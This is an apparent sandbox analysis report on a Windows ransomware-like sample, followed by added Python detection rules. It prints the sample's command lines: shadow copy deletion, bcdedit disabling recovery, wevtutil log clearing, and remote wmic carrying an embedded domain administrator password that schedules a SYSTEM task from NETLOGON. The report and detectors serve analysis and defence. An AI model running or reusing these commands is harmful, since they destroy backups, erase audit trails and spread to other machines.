Analysis
max time kernel: 149s
max time network: 115s
platform: windows10_x64
resource: win10v20201028
submitted: 22-01-2021 10:17

Static task: static1
Behavioral task: behavioral1
  Sample: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  Resource: win10v20201028

General
Target: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
Size: 1.0MB
MD5: 3281b2d95e7123a429001400c10ebe28
SHA1: b97308ea9f9c410188d43c34a867fa42c9e9128e
SHA256: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1
SHA512: 2d8829ba0023a0b0f2e3aaa48301f6458fec20e20c019840610f7f862a54615f46de28a5aeb470ae0df5e046d3a8da0310dc29df0b3f60f36ffe4438c469ff11
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro. In this run, however, the parent is the WMI provider host and both children are the direct result of the sample's own "WMIC.exe process call create" invocations (see the process tree): wmiprvse.exe creates cmd.exe on the sample's behalf, so the sample's command lines execute under a parent that is not the sample. The signature is still useful, because wmiprvse.exe spawning a shell is rare on a workstation.
Processes:
  description | pid | pid_target | process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3212 | 3364 | cmd.exe
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1932 | 3364 | cmd.exe
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
  pid  | process
  2848 | bcdedit.exe
  2712 | bcdedit.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  process (all 24 rows): 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe
  description (all 24 rows): File opened (read-only)
  ioc, in the order recorded: \??\I: \??\J: \??\L: \??\O: \??\T: \??\U: \??\H: \??\G: \??\V: \??\B: \??\N: \??\Q: \??\R: \??\S: \??\X: \??\Y: \??\Z: \??\A: \??\F: \??\K: \??\M: \??\P: \??\W: \??\E:
  (every drive letter except C: and D:)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of AdjustPrivilegeToken 187 IoCs
Processes: WMIC.exe (pid 2688), WMIC.exe (pid 3632)
  description | pid | process
  Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 2688 | WMIC.exe (the full set appears twice in the rows shown)
  Token: the same 21-entry set | 3632 | WMIC.exe (the rows shown end after one full pass and a further SeIncreaseQuotaPrivilege; the report counts 187 IoCs in total, so this listing is partial)
Caveat: WMIC.exe enables this privilege set as part of its normal start-up, independent of the command it is given, so on its own this signature says only that wmic ran. The command lines in the process tree carry the actual behaviour.
Suspicious use of WriteProcessMemory 34 IoCs
Processes: 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe, cmd.exe, cmd.exe, cmd.exe
  description | rows | pid | process | target pid | target process
  PID 3108 wrote to memory of 2688 | 3 | 3108 | 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe | 2688 | WMIC.exe
  PID 3108 wrote to memory of 3632 | 3 | 3108 | 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe | 3632 | WMIC.exe
  PID 3108 wrote to memory of 2112 | 3 | 3108 | 8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe | 2112 | cmd.exe
  PID 2112 wrote to memory of 3912 | 3 | 2112 | cmd.exe | 3912 | WMIC.exe
  PID 3212 wrote to memory of 556  | 2 | 3212 | cmd.exe | 556  | WMIC.exe
  PID 3212 wrote to memory of 2848 | 2 | 3212 | cmd.exe | 2848 | bcdedit.exe
  PID 3212 wrote to memory of 2712 | 2 | 3212 | cmd.exe | 2712 | bcdedit.exe
  PID 1932 wrote to memory of 1096 | 2 | 1932 | cmd.exe | 1096 | wevtutil.exe
  PID 1932 wrote to memory of 728  | 2 | 1932 | cmd.exe | 728  | wevtutil.exe
  PID 1932 wrote to memory of 2844 | 2 | 1932 | cmd.exe | 2844 | wevtutil.exe
  PID 1932 wrote to memory of 2752 | 2 | 1932 | cmd.exe | 2752 | wevtutil.exe
  PID 1932 wrote to memory of 1764 | 2 | 1932 | cmd.exe | 1764 | wevtutil.exe
  PID 1932 wrote to memory of 3292 | 2 | 1932 | cmd.exe | 3292 | wevtutil.exe
  PID 1932 wrote to memory of 2060 | 2 | 1932 | cmd.exe | 2060 | wevtutil.exe
  PID 1932 wrote to memory of 2116 | 2 | 1932 | cmd.exe | 2116 | wevtutil.exe
Caveat: every target is a child the writing process has just created (compare the process tree), so these are the parent-to-child writes that accompany process creation, not injection into an existing, unrelated process.
Processes

C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe  (pid 3108)
  "C:\Users\Admin\AppData\Local\Temp\8258c53a44012f6911281a6331c3ecbd834b6698b7d2dbf4b1828540793340d1.exe"
  - Enumerates connected drives
  - Suspicious use of WriteProcessMemory
  The sample is a 32-bit process: the children it requests by "C:\Windows\System32\..." path resolve to C:\Windows\SysWOW64\... under WOW64 file-system redirection.

  C:\Windows\SysWOW64\wbem\WMIC.exe  (pid 2688)
    "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\wbem\WMIC.exe  (pid 3632)
    "C:\Windows\System32\wbem\WMIC.exe" process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"'
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe  (pid 2112)
    "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"
    - Suspicious use of WriteProcessMemory
    Remote WMI process creation with embedded domain credentials: the addressed node is asked to create a scheduled task that runs \\corp.joycone.com\NETLOGON\sihot.exe as SYSTEM at logon, run it at once, then delete the task. No schtasks.exe process appears anywhere in this run's tree, so the request produced no visible effect in the sandbox.

    C:\Windows\SysWOW64\Wbem\WMIC.exe  (pid 3912)
      wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'Admin$joy' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"

C:\Windows\system32\cmd.exe  (pid 3212; parent wmiprvse.exe pid 3364, carrying out the Win32_Process.Create request issued by pid 2688 above)
  cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\Wbem\WMIC.exe  (pid 556)
    WMIC.exe shadowcopy delete /nointeractive

  C:\Windows\system32\bcdedit.exe  (the two bcdedit.exe children are pids 2848 and 2712)
    bcdedit.exe /set {default} recoveryenabled no
    - Modifies boot configuration data using bcdedit

  C:\Windows\system32\bcdedit.exe
    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    - Modifies boot configuration data using bcdedit

C:\Windows\system32\cmd.exe  (pid 1932; parent wmiprvse.exe pid 3364, carrying out the request issued by pid 3632 above)
  cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "security"&wevtutil cl "Application"&wevtutil cl "HardwareEvents"&wevtutil cl "System"&wevtutil cl "Setup"&wevtutil cl "Setup"
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  Eight wevtutil.exe children (pids 1096, 728, 2844, 2752, 1764, 3292, 2060, 2116), one per clause of the command line; "security" and "Setup" are cleared twice:

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "security"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "windows powershell"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "security"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "Application"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "HardwareEvents"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "System"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "Setup"

  C:\Windows\system32\wevtutil.exe
    wevtutil cl "Setup"

C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  (Volume Shadow Copy service. Its start is consistent with the shadowcopy delete request above; it is not a process the sample launched directly.)
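The signatures and the process tree above amount to a small set of process-creation rules a detection engineer would want on a Windows fleet: wmiprvse.exe spawning a shell, shadow copy deletion, bcdedit disabling recovery, wevtutil clearing logs, and remote wmic with inline credentials creating a SYSTEM scheduled task. The following Python is an added example (not part of the sandbox report or the sample's own code) that encodes those rules and runs them over constructed process-creation events in Sysmon Event ID 1 style (ParentImage, Image, CommandLine) mirroring the tree above. The rule names, the ATT&CK technique mapping, the "sample.exe" stand-in for the SHA256-named binary and the redacted WMI password are this example's assumptions; the two benign events at the end show what must not fire.

```python
"""Detection rules for the process chain in this report.

Added example, not part of the sandbox output. SAMPLE_EVENTS is constructed
to mirror the report's process tree in Sysmon Event ID 1 style (ParentImage,
Image, CommandLine); it is not real telemetry, 'sample.exe' stands in for
the SHA256-named sample, and the WMI password is redacted.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    rule: str
    technique: str  # ATT&CK technique ID; the mapping is this example's assumption
    event: ProcEvent


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def wmiprvse_spawns_shell(e: ProcEvent) -> bool:
    """WMI provider host starting a shell: what 'wmic process call create' produces."""
    return _base(e.parent_image) == "wmiprvse.exe" and _base(e.image) in {"cmd.exe", "powershell.exe"}


def shadow_copy_deletion(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return re.search(r"shadowcopy\s+delete|vssadmin(\.exe)?\s+delete\s+shadows", cl) is not None


def boot_recovery_disabled(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return "bcdedit" in cl and re.search(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", cl) is not None


def event_log_cleared(e: ProcEvent) -> bool:
    """'wevtutil cl <log>' clears a log; queries such as 'wevtutil qe' must not match."""
    return re.search(r"wevtutil(\.exe)?\s+cl\b", e.command_line.lower()) is not None


def remote_wmi_with_credentials(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return re.search(r"\bwmic(\.exe)?\b.*/node:", cl) is not None and "/password:" in cl


def schtasks_as_system_on_logon(e: ProcEvent) -> bool:
    cl = e.command_line.lower()
    return "schtasks" in cl and "/create" in cl and "/ru system" in cl


RULES = (
    ("wmiprvse_spawns_shell", "T1047", wmiprvse_spawns_shell),
    ("shadow_copy_deletion", "T1490", shadow_copy_deletion),
    ("boot_recovery_disabled", "T1490", boot_recovery_disabled),
    ("event_log_cleared", "T1070", event_log_cleared),
    ("remote_wmi_with_credentials", "T1047", remote_wmi_with_credentials),
    ("schtasks_as_system_on_logon", "T1053", schtasks_as_system_on_logon),
)


def scan(events):
    """Apply every rule to every event; one event may trigger several rules."""
    return [Finding(name, tid, e) for e in events for name, tid, pred in RULES if pred(e)]


def summarize(findings):
    """Rule name -> number of events that triggered it."""
    return dict(Counter(f.rule for f in findings))


# Constructed events shaped like the report's process tree (not real telemetry).
SAMPLE = r"C:\Users\Admin\AppData\Local\Temp\sample.exe"
WMIC32 = r"C:\Windows\SysWOW64\wbem\WMIC.exe"
WMIPRVSE = r"C:\Windows\system32\wbem\wmiprvse.exe"
CMD64 = r"C:\Windows\system32\cmd.exe"

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", SAMPLE, '"' + SAMPLE + '"'),
    ProcEvent(SAMPLE, WMIC32, r"""WMIC.exe process call create 'cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures'"""),
    ProcEvent(SAMPLE, WMIC32, r"""WMIC.exe process call create 'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "System"'"""),
    ProcEvent(SAMPLE, r"C:\Windows\SysWOW64\cmd.exe", r'''cmd.exe /c wmic /node:'0.0.0.0' /USER:'corp.joycone.com\Administrator' /PASSWORD:'<redacted>' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz40 /TR '\\corp.joycone.com\NETLOGON\sihot.exe' & SCHTASKS /run /TN sz40&SCHTASKS /Delete /TN sz40 /F"'''),
    ProcEvent(WMIPRVSE, CMD64, r"cmd.exe /c WMIC.exe shadowcopy delete /nointeractive & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(WMIPRVSE, CMD64, r'cmd.exe /c wevtutil cl "security"&wevtutil cl "windows powershell"&wevtutil cl "Application"&wevtutil cl "System"&wevtutil cl "Setup"'),
    ProcEvent(CMD64, r"C:\Windows\system32\bcdedit.exe", r"bcdedit.exe /set {default} recoveryenabled no"),
    ProcEvent(CMD64, r"C:\Windows\system32\wevtutil.exe", r'wevtutil cl "security"'),
    ProcEvent(CMD64, r"C:\Windows\system32\wevtutil.exe", r"wevtutil qe Security /c:5"),  # benign query
    ProcEvent(r"C:\Windows\system32\svchost.exe", WMIPRVSE, WMIPRVSE),  # normal provider host start
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:28} {f.technique}  {_base(f.event.image)}: {f.event.command_line[:60]}")
    print(summarize(scan(SAMPLE_EVENTS)))
```

The rules match on the lower-cased command line, so both the outer "process call create" request and the inner cmd.exe it produces fire; that is deliberate, since the intent is visible in the sample's own process before wmiprvse.exe ever acts on it. The wmiprvse_spawns_shell rule gives two hits on these events, the same count the sandbox reports above. The `\bcl\b` anchoring in event_log_cleared is what keeps routine "wevtutil qe" queries quiet.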
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
memory/556-4-0x0000000000000000-mapping.dmp
-
memory/728-7-0x0000000000000000-mapping.dmp
-
memory/1096-5-0x0000000000000000-mapping.dmp
-
memory/1764-11-0x0000000000000000-mapping.dmp
-
memory/2060-13-0x0000000000000000-mapping.dmp
-
memory/2112-6-0x0000000000000000-mapping.dmp
-
memory/2116-14-0x0000000000000000-mapping.dmp
-
memory/2688-2-0x0000000000000000-mapping.dmp
-
memory/2712-16-0x0000000000000000-mapping.dmp
-
memory/2752-10-0x0000000000000000-mapping.dmp
-
memory/2844-9-0x0000000000000000-mapping.dmp
-
memory/2848-15-0x0000000000000000-mapping.dmp
-
memory/3292-12-0x0000000000000000-mapping.dmp
-
memory/3632-3-0x0000000000000000-mapping.dmp
-
memory/3912-8-0x0000000000000000-mapping.dmp